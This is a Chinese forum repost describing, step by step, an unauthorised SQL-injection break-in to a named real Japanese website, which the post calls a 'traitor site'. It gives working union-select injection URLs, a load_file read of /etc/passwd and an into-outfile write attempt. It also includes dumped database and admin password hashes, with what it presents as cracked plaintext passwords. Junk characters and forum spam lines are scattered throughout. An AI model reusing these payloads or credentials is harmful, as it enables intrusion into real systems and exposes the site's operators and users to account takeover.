原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

3 u& d7 Q) i! M( w0x01. 检测 www.zuaa.jp 收集数据

, `$ _" F) a0 S
whatweb
6 w3 R! ?  ~7 Q+ U7 O+ A

利用NMAP扫描
# ^; H" \; |4 |, I/ H4 Y
/ O& w! K; y/ c. G3 W/ s) [+ \! \; u中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
8 x2 I0 o3 u+ V% O6 S; R  I0x02.找注入点
找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390

& C2 o  T( B  l9 n
% P3 [6 t& g$ k0x03.order by
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
, i: Y: R9 H1 U# `& z: W$ ?$ f
order by 28报错，order by 27正常
% z; R" @2 l9 C2 H. A
0x04.   union手动查询
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
7 D! Q- F. a- B* n& g- ~9 b2 M添加到 27 时正常显示
2 m( K) F- @; ^( H. I, N
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
: @8 H9 d; m' E. L. s
0x05. info:
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

user:            root@localhost
- u: S, V/ L0 c: ^2 Ddatabase:    openpne
version:      4.1.22
6 ]- f1 l5 ]5 s6 x, s/ Eos:             portbld-freebsd5.4
" d. ^; N, b+ C) e6 p
0x06. root用户
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
5 v2 @0 c& G4 i) h5 n
2 E* z+ O6 s1 U  f  ~+ g通过工具转换
, Q0 A7 I& T% R( K9 f/ `
+ j7 Q5 p; j5 x2 }$ v, |- x' S中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
1 L& c/ J+ x1 \# P$ j
0x07. 利用 into outfile
. n  S" J9 W$ L, g' A0 k全部都失败
, w/ G  r8 }5 S. ?. q1 s% r% Q* t. Hhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php

7 \+ d! v# o! x: v5 a' Bhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
! ?2 L1 x$ M+ Y/ W# R: Q8 [# q( P
页面显示“MDB2 Error:syntax error”
5 b, m, j4 U- x9 T
0x08. 利用 mysql 4.1
7 R. L. O# W6 I+ Y5 [猜常规表名，字段未果 工具 sqlmap
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

9 n) [; i' [& ?
/ d; T7 g; E4 _. F+ x& O
0x09. 查找后台
利用 现有的各种 后台工具尝试都不行

0x10.  MySL外联方法
从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
7 B$ ?8 v6 _5 |$ Z* Ehttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user

. ], s) j3 c' [! j$ n/ u这个可以在 www.cmd5.com 解密
9 ~6 m0 [- G1 p" [6 Sroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
1 N1 s" z) Q; r+ g, j  Qopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
( a. A1 G2 w6 vzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知


9 {: Y  W. g5 L6 c# b; b) B0x11. 网站突破
发现网站的源程序 openpne, google 下载 openpne 源码


/ `: I! F0 Q* X6 S0x12. 默认信息利用
' W+ H7 B/ `  S2 i( [* L# Hhttp://sns.zuaa.jp/?m=admin&a=page_login
& F( U! V* m+ Y3 C$ ^5 a0 ?
, d4 M' z0 I5 D& ]7 O4 ^表名 (c_admin_user) ，字段名（username,password）
' x5 K9 H2 z& u+ }http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user

解密
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
$ `* c' z5 p8 {) g; v/ Z
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0 q8 ~, [6 J8 [
0x13. 登录后台
7 a2 Z1 s4 }' n8 t( u


9 B4 j7 a5 p- m; r' m; Z0x14. 小结
利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
$ ~5 T% @1 q; P# W2 Q# B中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
$ W+ U! D9 U  {! h+ u+ P# z/ D+ S' E
最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！

荒村狂客

哪个牛人 费的这劲 入侵的